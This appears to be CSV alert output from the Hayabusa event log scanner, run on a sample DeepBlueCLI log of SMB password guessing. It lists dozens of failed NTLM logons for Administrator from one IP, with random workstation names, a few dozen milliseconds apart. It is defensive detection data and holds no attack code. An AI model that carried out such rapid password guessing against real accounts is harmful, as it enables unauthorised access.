2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6QiHHeHeY8yWOiJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rhzpo2bEgpJCB51w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuyPyMMT4wQhLIEz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no5bOZf3SEsrETun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBTHVleOipnyVFIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JNFE2jNifGI7pELk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LgkAKJ57rYqCdbew  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daKQcllU63lW4ypy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBSPSAoEBS7JRYuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94bI5pb8CGjY3QZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1obedLuMFlHlSvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EPn1yJV358YAFALV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qA7N5DMAJqNYkumM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Lk95NYGG5iLBFBw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3DDtXECsK61pIYy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rt8bfBDTV5wYfBO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uTYMgN5kmFpyj7xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmyF6j61wosCE0sg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fd61fJBRizl2AIGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDIFX7lsmGqSGvkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVmto6S25gU2bkwa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7QMbzSuGuzzMK0v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJUynF5bN1Oj0vaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dg4ZtybY5BnPN0nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gRmRV9ct3hor8Muk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QRjaP1mj9FgKsGBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CCzzatQ195mcxQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJPIrtk5GBAhsUlR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 720RHwyXQcxvsJBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GofmHRstuhljMDOL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wQUQ4INktwXwRkaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WHs5hduf7SmUcLK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gdo1txjJXiRLbUDH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JK8jP3ftKQOyutGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdbEjo88dBJRhrKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZCVkXkwhbuSM654  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z2mc9WScfBa88rtO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lee7qYLkXQoz8rRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g1ZKpZuZU1WRoC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4ST7RrHJxAQHHbn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GtW1hBHF97YqvN4N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVKlPytPofO9LQBm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GOkZ9yjvfL51UYXo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAxfxSbRqGO7Dej0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D7XmvDYk6zFLir09  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mWcl6CKdSMxd8edZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SxBQlFZvGBqDdobn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXN94VanwME6q8rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOj7CZ3stJXePY8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXjmqxguFGL3f8cV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHWmdxnRrMbxrdlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ROBnjuyHn4FRugk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zGxuUxasL680O21l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYoM984EzAkUtBoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0e3ATNpzeeAf6Qax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1A0dGhpVy8kgiRP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGgNAKJM5RAt9B5K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c3DpedXujvQpZnjQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BsaSjESaUHbsIxJL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ca4dlxyEco3VOapw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6lJc7DXAOcNZ2G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Olt5mS7na07VDJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCFeQcUMDTs0ev8v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYmH6CQrizoZ1DAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iYtujXkzySwZQFk8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KE9v6wzrebvjvDIl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81gmRFFBHI1s4dqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C8gHWPDjQM8M3tiQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: szj4mJvtFV06CuR2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ceGEl87hOM0InAAd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XRv3C3rRxYXTgckj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TaPkJPIQnbL3VyUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZ7PZAT6hWWHNc29  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
